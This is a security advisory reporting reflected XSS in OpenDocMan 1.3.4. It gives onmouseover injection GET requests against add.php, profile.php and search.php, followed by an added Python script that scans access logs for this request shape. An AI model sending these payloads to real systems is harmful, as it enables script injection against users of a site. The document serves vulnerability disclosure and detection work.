OpenDocMan 1.3.4 - Multiple XSS Injection

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - Multiple XSS Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management system (DMS)
# written in PHP designed to comply with ISO 17025 and OIE standard for document
# management. It features fine grained control of access to files, and automated
# install and upgrades.
===========================================================================================
# POC - XSS
# Parameters : add.php,profile.php,search.php
# Attack Pattern : /"onmouseover="alert(0x00136A)
# GET Request : http://localhost/opendocman/add.php/"onmouseover="alert(0x00136A)
# GET Request : http://localhost/opendocman/profile.php/"onmouseover="alert(0x00136A)
# GET Request : http://localhost/opendocman/search.php/"onmouseover="alert(0x00136A)
===========================================================================================
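Detection sketch for the request shape shown in the POC, added here as an example and not part of the original advisory or of OpenDocMan: it scans web server access logs for requests where extra path text follows add.php, profile.php or search.php and contains attribute-breaking characters or an inline event handler. The combined log format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Scripts named in the advisory; extend the tuple for other endpoints.
SCRIPTS = ("add.php", "profile.php", "search.php")

# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that break out of an HTML attribute, or an inline event handler.
BREAKOUT_RE = re.compile(r'["\'<>]|\bon[a-z]+\s*=', re.IGNORECASE)

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [05/Mar/2019:10:00:01 +0100] "GET /opendocman/search.php HTTP/1.1" 200 5120',
    '127.0.0.1 - - [05/Mar/2019:10:00:07 +0100] "GET /opendocman/add.php/%22onmouseover=%22alert(0x00136A) HTTP/1.1" 200 7311',
    '127.0.0.1 - - [05/Mar/2019:10:00:12 +0100] "GET /opendocman/profile.php/ HTTP/1.1" 200 6040',
    '127.0.0.1 - - [05/Mar/2019:10:00:15 +0100] "GET /opendocman/add.php/help HTTP/1.1" 200 7311',
]


def path_info(target):
    """Return the decoded text after '<script>.php/' in the path, or None."""
    path = unquote(target.split("?", 1)[0])  # drop query string, decode %xx
    lowered = path.lower()
    for script in SCRIPTS:
        idx = lowered.find("/" + script + "/")
        if idx != -1:
            return path[idx + len(script) + 2:]
    return None


def suspicious_requests(log_lines):
    """Yield (line_number, trailing_path) for requests matching the pattern."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        trailing = path_info(match.group("target"))
        # Plain path-info such as '/help' is not flagged; only breakout text is.
        if trailing and BREAKOUT_RE.search(trailing):
            yield number, trailing


if __name__ == "__main__":
    for number, trailing in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious path-info {trailing!r}")
```
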



Copyright 2019, cxsecurity.com

 
